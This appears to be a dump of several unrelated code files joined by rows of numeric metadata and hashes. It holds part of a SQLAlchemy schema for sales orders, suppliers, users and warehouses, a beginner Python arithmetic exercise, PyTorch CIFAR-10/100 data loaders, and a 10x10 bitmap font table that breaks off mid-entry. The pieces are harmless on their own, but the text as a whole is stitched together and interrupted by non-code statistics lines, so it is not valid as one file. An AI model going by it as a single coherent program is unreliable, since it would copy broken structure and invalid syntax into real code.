    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    # Denormalized customer name, duplicated here from the customer record.
    customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
    # What the customer originally asked for (may differ from the matched product).
    enquiry_production_model = Column(String(64), nullable=False, server_default=text("''"))
    enquiry_quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    # The catalog product offered in response to the enquiry.
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    delivery_time = Column(String(128), nullable=False, server_default=text("''"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    # Set once the line has been turned into an order; plus soft-delete state.
    status_ordered = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Rack(Base):
    """Storage rack inside a warehouse (table ``rack``)."""

    __tablename__ = 'rack'

    id = Column(Integer, primary_key=True)
    # Parent warehouse this rack belongs to.
    warehouse_id = Column(Integer, nullable=False)
    name = Column(String(16), nullable=False, server_default=text("''"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SalesOrder(Base):
    """Sales order header (table ``sales_order``).

    Holds customer references, order amounts, and the
    audit/effect/completion/delete workflow flags with their timestamps;
    line items live in ``sales_order_items``.
    """

    __tablename__ = 'sales_order'

    id = Column(Integer, primary_key=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
    # Monetary breakdown: production + shipping + adjustment -> order total.
    amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    amount_order = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    delivery_way = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    # Workflow state: audit, effect, completion, soft delete — each with a timestamp.
    audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
    status_effect = Column(Integer, nullable=False, server_default=text("'0'"))
    status_completion = Column(Integer, nullable=False, server_default=text("'0'"))
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    audit_time = Column(DateTime)
    effect_time = Column(DateTime)
    completion_time = Column(DateTime)
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SalesOrderItems(Base):
    """Sales order line item (table ``sales_order_items``).

    One row per product on a sales order (``sales_order_id``), keeping the
    customer's custom brand/model alongside the matched catalog product,
    plus quantity, unit price, and delivery terms.
    """

    __tablename__ = 'sales_order_items'

    id = Column(Integer, primary_key=True)
    sales_order_id = Column(Integer, nullable=False, index=True)
    uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    # Denormalized customer name, duplicated here from the customer record.
    customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
    # Customer-specific naming for the product (may differ from catalog fields below).
    custom_production_brand = Column(String(32), nullable=False, server_default=text("''"))
    custom_production_model = Column(String(64), nullable=False, server_default=text("''"))
    # The catalog product actually sold.
    production_id = Column(Integer, nullable=False, index=True)
    production_brand = Column(String(32), nullable=False, server_default=text("''"))
    production_model = Column(String(64), nullable=False, server_default=text("''"))
    production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
    delivery_time = Column(String(128), nullable=False, server_default=text("''"))
    quantity = Column(Integer, nullable=False, server_default=text("'0'"))
    unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
    note = Column(String(64), nullable=False, server_default=text("''"))
    type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SiteConfig(Base):
    """Company/site profile (table ``site_config``).

    Bilingual (Chinese/English) company name and address plus contact
    details; ``name_cn`` is unique.
    """

    __tablename__ = 'site_config'

    id = Column(Integer, primary_key=True)
    # Company name/address in Chinese (cn) and English (en).
    name_cn = Column(String(60), nullable=False, unique=True, server_default=text("''"))
    name_en = Column(String(60), nullable=False, server_default=text("''"))
    address_cn = Column(String(100), nullable=False, server_default=text("''"))
    address_en = Column(String(100), nullable=False, server_default=text("''"))
    mobile = Column(String(20), nullable=False, server_default=text("''"))
    tel = Column(String(20), nullable=False, server_default=text("''"))
    fax = Column(String(20), nullable=False, server_default=text("''"))
    email = Column(String(60), nullable=False, server_default=text("''"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Supplier(Base):
    """Supplier company record (table ``supplier``).

    Company-level contact details plus the owning user (``owner_uid``);
    individual contact persons live in ``supplier_contact``.
    """

    __tablename__ = 'supplier'

    id = Column(Integer, primary_key=True)
    company_name = Column(String(100), nullable=False, server_default=text("''"))
    company_address = Column(String(100), nullable=False, server_default=text("''"))
    company_site = Column(String(100), nullable=False, server_default=text("''"))
    company_tel = Column(String(100), nullable=False, server_default=text("''"))
    company_fax = Column(String(100), nullable=False, server_default=text("''"))
    company_email = Column(String(100), nullable=False, server_default=text("''"))
    company_type = Column(Integer, nullable=False, server_default=text("'0'"))
    # User who owns/manages this supplier relationship.
    owner_uid = Column(Integer, nullable=False, server_default=text("'0'"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SupplierContact(Base):
    """Contact person at a supplier company (table ``supplier_contact``).

    ``cid`` references the supplier company; ``status_default`` marks the
    default contact for that company.
    """

    __tablename__ = 'supplier_contact'

    id = Column(Integer, primary_key=True)
    # Supplier company this contact belongs to.
    cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    name = Column(String(20), nullable=False, server_default=text("''"))
    salutation = Column(String(20), nullable=False, server_default=text("''"))
    mobile = Column(String(20), nullable=False, server_default=text("''"))
    tel = Column(String(20), nullable=False, server_default=text("''"))
    fax = Column(String(20), nullable=False, server_default=text("''"))
    email = Column(String(60), nullable=False, server_default=text("''"))
    department = Column(String(20), nullable=False, server_default=text("''"))
    address = Column(String(100), nullable=False, server_default=text("''"))
    note = Column(String(256), nullable=False, server_default=text("''"))
    # Flag marking the default contact for the company.
    status_default = Column(Integer, nullable=False, server_default=text("'0'"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SupplierInvoice(Base):
    """Invoicing details for a supplier (table ``supplier_invoice``).

    Keyed by the supplier company id (``cid`` is the primary key, not an
    autoincrement surrogate), holding tax id and bank details used on
    invoices.
    """

    __tablename__ = 'supplier_invoice'

    # One invoice-detail row per supplier company.
    cid = Column(Integer, primary_key=True)
    company_name = Column(String(100), nullable=False, server_default=text("''"))
    company_tax_id = Column(String(20), nullable=False, server_default=text("''"))
    company_address = Column(String(100), nullable=False, server_default=text("''"))
    company_tel = Column(String(100), nullable=False, server_default=text("''"))
    company_bank_name = Column(String(100), nullable=False, server_default=text("''"))
    company_bank_account = Column(String(100), nullable=False, server_default=text("''"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class User(Base):
    """Application user (table ``user``).

    Contact details plus a role reference (``role_id``); credentials are
    stored separately (see ``UserAuth``).
    """

    __tablename__ = 'user'

    id = Column(Integer, primary_key=True)
    # Unique login/display name; utf8mb4_bin collation makes comparison
    # byte-wise (case-sensitive) at the DB level.
    name = Column(String(20, u'utf8mb4_bin'), nullable=False, unique=True, server_default=text("''"))
    salutation = Column(String(20), nullable=False, server_default=text("''"))
    mobile = Column(String(20), nullable=False, server_default=text("''"))
    tel = Column(String(20), nullable=False, server_default=text("''"))
    fax = Column(String(20), nullable=False, server_default=text("''"))
    email = Column(String(60), nullable=False, server_default=text("''"))
    role_id = Column(Integer, nullable=False, server_default=text("'0'"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class UserAuth(Base):
    """Authentication credential for a user (table ``user_auth``).

    One row per (auth type, key) pair — the composite index ``type_auth``
    enforces uniqueness — linked back to a user via ``user_id``.
    """

    __tablename__ = 'user_auth'
    __table_args__ = (
        # A given key may appear only once per auth type.
        Index('type_auth', 'type_auth', 'auth_key', unique=True),
    )

    id = Column(Integer, primary_key=True)
    user_id = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
    # Discriminator for the credential kind (integer code).
    type_auth = Column(Integer, nullable=False, server_default=text("'0'"))
    # Key/secret pair; utf8mb4_bin collation makes comparison byte-wise
    # (case-sensitive) at the DB level.
    auth_key = Column(String(60, u'utf8mb4_bin'), nullable=False, server_default=text("''"))
    auth_secret = Column(String(60, u'utf8mb4_bin'), nullable=False, server_default=text("''"))
    status_verified = Column(Integer, nullable=False, server_default=text("'0'"))
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Warehouse(Base):
    """Warehouse record (table ``warehouse``); racks reference it via
    ``Rack.warehouse_id``. ``name`` is unique."""

    __tablename__ = 'warehouse'

    id = Column(Integer, primary_key=True)
    name = Column(String(100), nullable=False, unique=True, server_default=text("''"))
    address = Column(String(100), nullable=False, server_default=text("''"))
    # Contact person for the warehouse.
    linkman = Column(String(20), nullable=False, server_default=text("''"))
    tel = Column(String(20), nullable=False, server_default=text("''"))
    fax = Column(String(20), nullable=False, server_default=text("''"))
    # Soft-delete flag and lifecycle timestamps (all defaults are DB-side).
    status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
    delete_time = Column(DateTime)
    create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
    update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
| 60.233418
| 120
| 0.721788
| 5,902
| 47,223
| 5.555066
| 0.033887
| 0.191515
| 0.236442
| 0.329897
| 0.947417
| 0.945556
| 0.939883
| 0.92933
| 0.916153
| 0.904593
| 0
| 0.021527
| 0.12352
| 47,223
| 783
| 121
| 60.310345
| 0.770597
| 0.000275
| 0
| 0.797317
| 0
| 0
| 0.084837
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00149
| false
| 0
| 0.002981
| 0.00149
| 0.973174
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
76ae366de6a09065de482a480359f621fb1ab980
| 224
|
py
|
Python
|
ex3.py
|
scotteza/learn-python-3-the-hard-way
|
0ef5f64aae6f78e1afd81361771ae27b155d8f7e
|
[
"MIT"
] | null | null | null |
ex3.py
|
scotteza/learn-python-3-the-hard-way
|
0ef5f64aae6f78e1afd81361771ae27b155d8f7e
|
[
"MIT"
] | null | null | null |
ex3.py
|
scotteza/learn-python-3-the-hard-way
|
0ef5f64aae6f78e1afd81361771ae27b155d8f7e
|
[
"MIT"
] | null | null | null |
# Arithmetic exercise: evaluate expressions and print their values.
# Note: / is true (float) division, % is modulo — so e.g. 12/7 prints a float.

hens = 25 + 30 / 6
roosters = 100 - 25 * 3 / 4
print("Hens", hens)
print("Roosters", roosters)

# Mixed precedence: % and / bind tighter than + and -.
print(3 + 2 + 1 - 5 + 4 % 2 - 1 / 4 + 6)

# Comparison expressions print True/False.
print(3 + 2 < 5 - 7)
print(5 > -2)
print(5 >= -2)
print(5 <= -2)

# Modulo and division examples.
print(3 % 2)
print(4 % 2)
print(12 / 7)
print(22 / 7)
| 13.176471
| 40
| 0.482143
| 47
| 224
| 2.297872
| 0.319149
| 0.277778
| 0.194444
| 0.333333
| 0.240741
| 0.240741
| 0.240741
| 0
| 0
| 0
| 0
| 0.25
| 0.267857
| 224
| 16
| 41
| 14
| 0.408537
| 0
| 0
| 0
| 0
| 0
| 0.053571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
76cbed852b90e5d320a99892707bd0602c15fd62
| 4,790
|
py
|
Python
|
lib/data/cifar.py
|
liqi17thu/Stand-Alone-Self-Attention
|
43c016ca14a9f5ce7ab59eefe2c41d96df04d151
|
[
"MIT"
] | 1
|
2020-11-29T15:59:07.000Z
|
2020-11-29T15:59:07.000Z
|
lib/data/cifar.py
|
liqi17thu/Stand-Alone-Self-Attention
|
43c016ca14a9f5ce7ab59eefe2c41d96df04d151
|
[
"MIT"
] | null | null | null |
lib/data/cifar.py
|
liqi17thu/Stand-Alone-Self-Attention
|
43c016ca14a9f5ce7ab59eefe2c41d96df04d151
|
[
"MIT"
] | null | null | null |
import torch
from torchvision import datasets, transforms
from lib.config import cfg
from lib.data.data_util import CIFAR10Policy
def cifar10():
    """Build CIFAR-10 train/test DataLoaders from the global ``cfg``.

    Returns:
        ([train_loader, test_loader], [train_sampler, test_sampler], 10)
        where the samplers are ``DistributedSampler`` instances when
        ``cfg.ddp.distributed`` is set, else ``None``, and 10 is the
        number of classes.
    """
    # Only rank 0 logs, to avoid duplicate output under DDP.
    if cfg.ddp.local_rank == 0:
        print('Load Dataset :: {}'.format(cfg.dataset.name))

    # Training augmentation: crop + flip, optionally the AutoAugment
    # CIFAR-10 policy, then tensor conversion and normalization.
    train_ops = [
        transforms.RandomCrop(32, padding=4),
        transforms.RandomHorizontalFlip(),
    ]
    if cfg.dataset.use_aa:
        train_ops.append(CIFAR10Policy())
    train_ops += [
        transforms.ToTensor(),
        transforms.Normalize(
            mean=cfg.dataset.mean,
            std=cfg.dataset.std
        ),
    ]
    transform_train = transforms.Compose(train_ops)

    # Test pipeline: no augmentation, just tensor + normalization.
    transform_test = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize(
            mean=cfg.dataset.mean,
            std=cfg.dataset.std
        ),
    ])

    train_data = datasets.CIFAR10('data', train=True, download=True, transform=transform_train)
    test_data = datasets.CIFAR10('data', train=False, transform=transform_test)

    if cfg.ddp.distributed:
        train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
        test_sampler = torch.utils.data.distributed.DistributedSampler(test_data)
    else:
        train_sampler = None
        test_sampler = None

    # DataLoader requires shuffle=False whenever a sampler is supplied;
    # shuffle only the (non-distributed) training set.
    train_loader = torch.utils.data.DataLoader(
        train_data,
        batch_size=cfg.dataset.batch_size,
        shuffle=(train_sampler is None),
        sampler=train_sampler,
        num_workers=cfg.dataset.workers
    )
    test_loader = torch.utils.data.DataLoader(
        test_data,
        batch_size=cfg.dataset.batch_size,
        shuffle=False,
        sampler=test_sampler,
        num_workers=cfg.dataset.workers
    )
    return [train_loader, test_loader], [train_sampler, test_sampler], 10
def cifar100(cfg):
    """Build CIFAR-100 train/test DataLoaders from *cfg*.

    Args:
        cfg: configuration object providing ``cfg.dataset`` (use_aa, mean,
            std, batch_size, workers) and ``cfg.ddp.distributed``.

    Returns:
        ([train_loader, test_loader], [train_sampler, test_sampler], 100)
        where the samplers are ``DistributedSampler`` instances when
        ``cfg.ddp.distributed`` is set, else ``None``, and 100 is the
        number of classes.
    """
    # Training augmentation: crop + flip, optionally the AutoAugment
    # CIFAR-10 policy, then tensor conversion and normalization.
    train_ops = [
        transforms.RandomCrop(32, padding=4),
        transforms.RandomHorizontalFlip(),
    ]
    if cfg.dataset.use_aa:
        train_ops.append(CIFAR10Policy())
    train_ops += [
        transforms.ToTensor(),
        transforms.Normalize(
            mean=cfg.dataset.mean,
            std=cfg.dataset.std
        ),
    ]
    transform_train = transforms.Compose(train_ops)

    # Test pipeline: no augmentation, just tensor + normalization.
    # BUGFIX: previously passed std=cfg.dataset.mean, normalizing the test
    # set with the wrong scale (inconsistent with the train transform and
    # with cifar10()).
    transform_test = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize(
            mean=cfg.dataset.mean,
            std=cfg.dataset.std
        ),
    ])

    train_data = datasets.CIFAR100('data', train=True, download=True, transform=transform_train)
    test_data = datasets.CIFAR100('data', train=False, transform=transform_test)

    if cfg.ddp.distributed:
        train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
        test_sampler = torch.utils.data.distributed.DistributedSampler(test_data)
    else:
        train_sampler = None
        test_sampler = None

    # DataLoader requires shuffle=False whenever a sampler is supplied;
    # shuffle only the (non-distributed) training set.
    train_loader = torch.utils.data.DataLoader(
        train_data,
        batch_size=cfg.dataset.batch_size,
        shuffle=(train_sampler is None),
        sampler=train_sampler,
        num_workers=cfg.dataset.workers
    )
    test_loader = torch.utils.data.DataLoader(
        test_data,
        batch_size=cfg.dataset.batch_size,
        shuffle=False,
        sampler=test_sampler,
        num_workers=cfg.dataset.workers
    )
    return [train_loader, test_loader], [train_sampler, test_sampler], 100
| 30.903226
| 96
| 0.598747
| 479
| 4,790
| 5.816284
| 0.123173
| 0.111271
| 0.060302
| 0.05743
| 0.9257
| 0.906317
| 0.906317
| 0.906317
| 0.906317
| 0.906317
| 0
| 0.011793
| 0.309603
| 4,790
| 154
| 97
| 31.103896
| 0.830662
| 0
| 0
| 0.783582
| 0
| 0
| 0.007098
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0
| 0.029851
| 0
| 0.059701
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f992fd262d8c7dc30e1fdf9d45501e6cc5b5e55
| 22,976
|
py
|
Python
|
letters.py
|
lemariva/Xmas-lights
|
7a50a6f93e6f97fc195254def401f805b80ecb14
|
[
"Apache-2.0"
] | null | null | null |
letters.py
|
lemariva/Xmas-lights
|
7a50a6f93e6f97fc195254def401f805b80ecb14
|
[
"Apache-2.0"
] | null | null | null |
letters.py
|
lemariva/Xmas-lights
|
7a50a6f93e6f97fc195254def401f805b80ecb14
|
[
"Apache-2.0"
] | null | null | null |
#Copyright [2017] [Mauro Riva <lemariva@mail.com> <lemariva.com>]
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
# 10x10 bitmap font table: maps a character to a 10-row x 10-column grid of
# 0/1 pixel values (rows listed top-to-bottom), presumably for rendering text
# on a 10x10 LED matrix — TODO confirm against the caller.
# Covers A-Z, 0-9, and most printable ASCII punctuation.
# NOTE(review): "|" maps to an all-zero grid (renders as blank) — confirm intentional.
letters = {"A": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 0, 0, 0], [0, 1, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "B": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "C": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "D": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "E": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "F": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 1, 1, 0, 0, 1, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "G": [[0, 0, 0, 0, 0, 0, 
0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "H": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "I": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "J": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "K": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "L": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "M": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 
